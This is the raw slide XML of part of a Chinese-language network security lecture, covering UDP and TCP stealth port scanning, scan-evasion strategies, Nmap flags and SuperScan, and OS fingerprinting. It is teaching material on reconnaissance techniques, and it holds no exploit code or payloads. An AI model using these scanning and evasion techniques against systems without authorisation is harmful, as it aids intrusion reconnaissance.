              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以完成对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口的探测。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要系统管理员的权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描结果可靠性不高，没收到应答，有可能数据报传丢了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描速度很慢，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC1812</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误报文生成速度做出了限制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394246" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B97BCA6C-3187-40AD-BE8E-D1DAE775EF9E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127925923"/>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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描器的基本工作原理</a:t>
            </a:r>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pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>投石问路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="ss copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="2109559"/>
            <a:ext cx="5544616" cy="4343777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396242652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p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大部分基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的握手与挥手，主要包括以下三类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开放扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>半开放扫描（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描、分段扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口扫描类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C7A34942-AE82-4338-9DE7-02A83A922E90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641105470"/>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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随机端口扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>碎片扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协同扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161794" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口扫描策略</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161796"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17B5ADA-7289-482F-87A0-52A12D446BFC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>84</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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36208029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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被称为“扫描器之王”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>for Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>for Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的两种版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Libpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Winpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库的支持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>能够进行普通扫描、各种高级扫描和操作系统类型鉴别等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>半开式扫描  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>普通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sU：udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-O：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统鉴别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>P0：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>强行扫描（无论是否能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通目标）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-p：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定端口范围</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>v：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>详细模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164866" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164868"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4869"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215DB41B-8A13-4B94-9F6F-3A80FC5D3C00}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10957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825" y="162877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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2017776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box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="7"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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SuperScan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>平台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>速度快，图形化界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>傻瓜化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165890" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165892"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5893"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C8552EC7-D8BE-4701-B744-633600F846C1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97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3363" y="1773238"/>
            <a:ext cx="5100637"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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="917808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ox(in)">
                                      <p:cBhvr>
                                        <p:cTn id="7"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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>许多漏洞是系统相关的，且往往与相应的版本对应。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈有标准化定义，但各厂家，如微软和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，在编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈时做出了不同解释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>独有特性，被称为“指纹”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这些细微的差别，可准确定位操作系统版本。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统识别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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2047848164"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN/PSH/URG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包到关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
